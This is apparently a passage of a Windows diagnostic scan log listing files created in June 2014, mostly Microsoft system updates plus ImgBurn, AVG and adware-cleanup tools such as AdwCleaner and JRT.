[2014/06/15 03:04:03 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll
[2014/06/15 03:04:03 | 000,012,800 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msfeedssync.exe
[2014/06/15 03:04:02 | 000,942,592 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jsIntl.dll
[2014/06/15 03:04:02 | 000,553,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll
[2014/06/15 03:04:02 | 000,086,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesysprep.dll
[2014/06/15 03:04:02 | 000,074,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\SetIEInstalledDate.exe
[2014/06/15 03:04:02 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmler.dll
[2014/06/15 03:04:01 | 000,247,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msls31.dll
[2014/06/15 03:04:01 | 000,195,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msrating.dll
[2014/06/15 03:04:01 | 000,086,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\RegisterIEPKEYs.exe
[2014/06/15 03:04:00 | 005,765,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll
[2014/06/15 03:04:00 | 000,708,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9diag.dll
[2014/06/15 03:04:00 | 000,574,976 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieui.dll
[2014/06/15 03:04:00 | 000,131,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\IEAdvpack.dll
[2014/06/15 03:04:00 | 000,105,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesysprep.dll
[2014/06/15 03:04:00 | 000,090,112 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\SetIEInstalledDate.exe
[2014/06/15 03:04:00 | 000,077,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\tdc.ocx
[2014/06/15 03:04:00 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmler.dll
[2014/06/15 03:04:00 | 000,040,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\JavaScriptCollectionAgent.dll
[2014/06/15 03:04:00 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeedssync.exe
[2014/06/15 03:03:59 | 000,453,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtmsft.dll
[2014/06/15 03:03:59 | 000,413,696 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\html.iec
[2014/06/15 03:03:59 | 000,296,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtrans.dll
[2014/06/15 03:03:58 | 001,993,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl
[2014/06/15 03:03:58 | 001,228,800 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmlmedia.dll
[2014/06/15 03:03:58 | 000,817,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dll
[2014/06/15 03:03:58 | 000,616,104 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dat
[2014/06/15 03:03:58 | 000,235,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\url.dll
[2014/06/15 03:03:58 | 000,218,624 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe
[2014/06/15 03:03:58 | 000,081,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\icardie.dll
[2014/06/15 03:03:58 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll
[2014/06/15 03:03:58 | 000,033,792 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll
[2014/06/15 03:03:58 | 000,030,208 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\licmgr10.dll
[2014/06/15 03:03:57 | 000,626,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll
[2014/06/15 03:03:57 | 000,548,352 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\vbscript.dll
[2014/06/15 03:03:57 | 000,167,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iexpress.exe
[2014/06/15 03:03:57 | 000,143,872 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wextract.exe
[2014/06/15 03:03:57 | 000,139,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe
[2014/06/15 03:03:57 | 000,101,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\inseng.dll
[2014/06/15 03:03:57 | 000,084,992 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2014/06/15 03:03:56 | 000,774,144 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript.dll
[2014/06/15 03:03:56 | 000,147,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\occache.dll
[2014/06/15 03:03:56 | 000,111,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollector.exe
[2014/06/15 03:03:56 | 000,083,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MshtmlDac.dll
[2014/06/15 03:03:56 | 000,062,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\pngfilt.dll
[2014/06/15 03:03:56 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwproxystub.dll
[2014/06/15 03:03:56 | 000,013,824 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshta.exe
[2014/06/15 03:03:56 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollectorres.dll
[2014/06/15 03:03:55 | 000,135,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iepeers.dll
[2014/06/15 03:03:55 | 000,048,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\imgutil.dll
[2014/06/15 03:02:08 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype
[2014/06/13 04:42:41 | 000,000,000 | --SD | C] -- C:\Windows\SysNative\CompatTel
[2014/06/13 04:09:42 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\MRT
[2014/06/13 04:08:38 | 012,625,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmploc.DLL
[2014/06/13 04:08:37 | 012,625,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmploc.DLL
[2014/06/13 04:08:36 | 011,410,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmp.dll
[2014/06/13 04:08:34 | 014,631,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmp.dll
[2014/06/13 03:53:46 | 000,000,000 | ---D | C] -- C:\b79f2c9c09dfec8b7662393b13f543c6
[2014/06/12 23:11:54 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\ImgBurn
[2014/06/12 22:37:50 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ImgBurn
[2014/06/12 22:37:40 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\ImgBurn
[2014/06/12 22:34:35 | 003,469,871 | ---- | C] (LIGHTNING UK!) -- C:\Users\COCHRAN\Desktop\SetupImgBurn_2.5.8.0.exe
[2014/06/12 22:11:19 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/06/12 22:10:35 | 001,016,261 | ---- | C] (Thisisu) -- C:\Users\COCHRAN\Desktop\JRT.exe
[2014/06/12 22:02:33 | 000,536,576 | ---- | C] (SQLite Development Team) -- C:\Windows\SysWow64\sqlite3.dll
[2014/06/12 22:01:56 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/06/12 21:25:04 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\AVG2014
[2014/06/12 21:24:07 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
[2014/06/12 21:23:40 | 000,000,000 | -H-D | C] -- C:\$AVG
[2014/06/12 21:23:40 | 000,000,000 | ---D | C] -- C:\ProgramData\AVG2014
[2014/06/12 21:16:39 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Local\Avg2014
[2014/06/12 20:52:00 | 000,335,360 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msieftp.dll
[2014/06/12 20:51:59 | 000,301,568 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msieftp.dll
[2014/06/12 20:51:56 | 000,633,856 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\comctl32.dll
[2014/06/12 20:51:51 | 000,224,256 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wintrust.dll
[2014/06/12 20:51:44 | 000,801,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\usp10.dll
[2014/06/12 20:51:30 | 000,465,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WMPhoto.dll
[2014/06/12 20:51:30 | 000,417,792 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\WMPhoto.dll
[2014/06/12 20:51:28 | 001,474,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\crypt32.dll
[2014/06/12 20:51:28 | 000,139,776 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cryptnet.dll
[2014/06/12 20:51:22 | 000,484,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wer.dll
[2014/06/12 20:51:22 | 000,381,440 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wer.dll
[2014/06/12 20:51:21 | 000,081,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\imagehlp.dll
[2014/06/12 20:51:20 | 000,376,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\netio.sys
[2014/06/12 20:51:20 | 000,288,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\FWPKCLNT.SYS
[2014/06/12 20:51:11 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msxml6r.dll
[2014/06/12 20:51:11 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msxml6r.dll
[2014/06/12 20:51:11 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msxml3r.dll
[2014/06/12 20:51:11 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msxml3r.dll
[2014/06/12 20:50:55 | 000,230,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\portcls.sys
[2014/06/12 20:50:55 | 000,116,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\drmk.sys
[2014/06/12 20:50:54 | 000,155,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\ataport.sys
[2014/06/12 20:50:52 | 001,930,752 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\authui.dll
[2014/06/12 20:50:52 | 001,796,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\authui.dll
[2014/06/12 20:50:52 | 000,197,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\credui.dll
[2014/06/12 20:50:52 | 000,190,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\SmartcardCredentialProvider.dll
[2014/06/12 20:50:52 | 000,152,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\SmartcardCredentialProvider.dll
[2014/06/12 20:50:47 | 000,368,128 | ---- | C] (Adobe Systems Incorporated) -- C:\Windows\SysNative\atmfd.dll
[2014/06/12 20:50:47 | 000,295,424 | ---- | C] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\atmfd.dll
[2014/06/12 20:50:47 | 000,041,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\lpk.dll
[2014/06/12 20:50:47 | 000,014,336 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dciman32.dll
[2014/06/12 20:50:46 | 000,100,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\fontsub.dll
[2014/06/12 20:50:46 | 000,070,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\fontsub.dll
[2014/06/12 20:50:46 | 000,046,080 | ---- | C] (Adobe Systems) -- C:\Windows\SysNative\atmlib.dll
[2014/06/12 20:50:46 | 000,034,304 | ---- | C] (Adobe Systems) -- C:\Windows\SysWow64\atmlib.dll
[2014/06/12 20:50:44 | 000,658,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\RMActivate_isv.exe
[2014/06/12 20:50:44 | 000,626,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\RMActivate.exe
[2014/06/12 20:50:44 | 000,594,944 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\RMActivate_isv.exe
[2014/06/12 20:50:44 | 000,572,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\RMActivate.exe
[2014/06/12 20:50:43 | 000,553,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\RMActivate_ssp.exe
[2014/06/12 20:50:43 | 000,552,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\RMActivate_ssp_isv.exe
[2014/06/12 20:50:43 | 000,510,976 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\RMActivate_ssp.exe
[2014/06/12 20:50:43 | 000,508,928 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\RMActivate_ssp_isv.exe
[2014/06/12 20:50:42 | 000,528,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msdrm.dll
[2014/06/12 20:50:42 | 000,488,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\secproc.dll
[2014/06/12 20:50:42 | 000,485,888 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\secproc_isv.dll
[2014/06/12 20:50:42 | 000,428,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\secproc.dll
[2014/06/12 20:50:42 | 000,423,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\secproc_isv.dll
[2014/06/12 20:50:42 | 000,123,392 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\secproc_ssp_isv.dll
[2014/06/12 20:50:42 | 000,123,392 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\secproc_ssp.dll
[2014/06/12 20:50:42 | 000,087,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\secproc_ssp_isv.dll
[2014/06/12 20:50:42 | 000,087,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\secproc_ssp.dll
[2014/06/12 20:50:30 | 000,325,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\usbport.sys
[2014/06/12 20:50:30 | 000,007,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\usbd.sys
[2014/06/12 20:50:20 | 001,888,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WMVDECOD.DLL
[2014/06/12 20:50:19 | 001,620,992 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\WMVDECOD.DLL
[2014/06/12 20:50:16 | 001,217,024 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rpcrt4.dll
[2014/06/12 20:50:15 | 000,076,800 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\hidclass.sys
[2014/06/12 20:50:15 | 000,032,896 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\hidparse.sys
[2014/06/12 20:50:14 | 000,102,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\davclnt.dll
[2014/06/12 20:50:11 | 005,550,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe
[2014/06/12 20:50:10 | 003,969,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe
[2014/06/12 20:50:10 | 001,460,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\lsasrv.dll
[2014/06/12 20:50:09 | 003,914,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe
[2014/06/12 20:50:09 | 000,455,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winlogon.exe
[2014/06/12 20:50:09 | 000,424,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\KernelBase.dll
[2014/06/12 20:50:08 | 000,722,944 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\objsel.dll
[2014/06/12 20:50:08 | 000,538,112 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\objsel.dll
[2014/06/12 20:50:06 | 000,136,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspicli.dll
[2014/06/12 20:50:06 | 000,112,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\smss.exe
[2014/06/12 20:50:06 | 000,057,344 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cngprovider.dll
[2014/06/12 20:50:06 | 000,056,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\adprovider.dll
[2014/06/12 20:50:06 | 000,053,760 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\capiprovider.dll
[2014/06/12 20:50:06 | 000,052,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dpapiprovider.dll
[2014/06/12 20:50:06 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\cngprovider.dll
[2014/06/12 20:50:06 | 000,049,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\adprovider.dll
[2014/06/12 20:50:06 | 000,048,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\capiprovider.dll
[2014/06/12 20:50:06 | 000,047,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dpapiprovider.dll
[2014/06/12 20:50:06 | 000,044,544 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dimsroam.dll
[2014/06/12 20:50:06 | 000,043,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\csrsrv.dll
[2014/06/12 20:50:06 | 000,036,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dimsroam.dll
[2014/06/12 20:50:05 | 000,307,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ncrypt.dll
[2014/06/12 20:50:05 | 000,039,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wincredprovider.dll
[2014/06/12 20:50:05 | 000,035,328 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wincredprovider.dll
[2014/06/12 20:50:05 | 000,029,184 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspisrv.dll
[2014/06/12 20:50:05 | 000,028,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\secur32.dll
[2014/06/12 20:50:03 | 000,006,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\apisetschema.dll
[2014/06/12 20:50:03 | 000,006,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\apisetschema.dll
[2014/06/12 20:49:42 | 003,928,064 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\d2d1.dll
[2014/06/12 20:49:42 | 002,565,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\d3d10warp.dll
[2014/06/12 20:49:25 | 000,878,080 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\advapi32.dll
[2014/06/12 20:49:24 | 001,732,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntdll.dll
[2014/06/12 20:49:24 | 000,859,648 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\tdh.dll
[2014/06/12 20:49:24 | 000,619,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\tdh.dll
[2014/06/12 20:49:14 | 000,190,912 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\storport.sys
[2014/06/12 20:49:14 | 000,027,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\Diskdump.sys
[2014/06/12 20:49:14 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iologmsg.dll
[2014/06/12 20:49:14 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iologmsg.dll
[2014/06/12 20:49:05 | 000,197,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\shdocvw.dll
[2014/06/12 20:48:54 | 000,506,368 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/06/12 20:48:54 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/06/12 20:48:40 | 000,404,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\gdi32.dll
[2014/06/12 20:48:39 | 000,624,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\qedit.dll
[2014/06/12 20:48:39 | 000,509,440 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\qedit.dll
[2014/06/12 20:48:38 | 000,102,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
[2014/06/12 20:48:37 | 000,124,112 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\PresentationCFFRasterizerNative_v0300.dll
[2014/06/12 20:43:40 | 001,163,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\kernel32.dll
[2014/06/12 20:43:40 | 000,362,496 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wow64win.dll
[2014/06/12 20:43:40 | 000,338,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\conhost.exe
[2014/06/12 20:43:40 | 000,243,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wow64.dll
[2014/06/12 20:43:40 | 000,215,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winsrv.dll
[2014/06/12 20:43:40 | 000,025,600 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\setup16.exe
[2014/06/12 20:43:40 | 000,014,336 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntvdm64.dll
[2014/06/12 20:43:39 | 000,016,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntvdm64.dll
[2014/06/12 20:43:39 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wow64cpu.dll
[2014/06/12 20:43:39 | 000,007,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\instnm.exe
[2014/06/12 20:43:39 | 000,006,144 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-security-base-l1-1-0.dll
[2014/06/12 20:43:39 | 000,005,120 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-file-l1-1-0.dll
[2014/06/12 20:43:39 | 000,005,120 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-file-l1-1-0.dll
[2014/06/12 20:43:39 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wow32.dll
[2014/06/12 20:43:39 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-threadpool-l1-1-0.dll
[2014/06/12 20:43:39 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-processthreads-l1-1-0.dll
[2014/06/12 20:43:39 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-processthreads-l1-1-0.dll
[2014/06/12 20:43:39 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-sysinfo-l1-1-0.dll
[2014/06/12 20:43:39 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-sysinfo-l1-1-0.dll
[2014/06/12 20:43:39 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-synch-l1-1-0.dll
[2014/06/12 20:43:39 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-synch-l1-1-0.dll
[2014/06/12 20:43:39 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-misc-l1-1-0.dll
[2014/06/12 20:43:39 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-localregistry-l1-1-0.dll
[2014/06/12 20:43:39 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-localregistry-l1-1-0.dll
[2014/06/12 20:43:39 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-rtlsupport-l1-1-0.dll
[2014/06/12 20:43:39 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-libraryloader-l1-1-0.dll
[2014/06/12 20:43:39 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-libraryloader-l1-1-0.dll
[2014/06/12 20:43:39 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-string-l1-1-0.dll
[2014/06/12 20:43:39 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-string-l1-1-0.dll
[2014/06/12 20:43:39 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-rtlsupport-l1-1-0.dll
[2014/06/12 20:43:39 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-profile-l1-1-0.dll
[2014/06/12 20:43:39 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-profile-l1-1-0.dll
[2014/06/12 20:43:38 | 000,006,144 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
[2014/06/12 20:43:38 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-processenvironment-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-processenvironment-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-namedpipe-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-namedpipe-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-misc-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-memory-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-memory-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-interlocked-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-heap-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-heap-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-xstate-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-util-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-io-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-io-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-interlocked-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-handle-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-handle-l1-1-0.dll
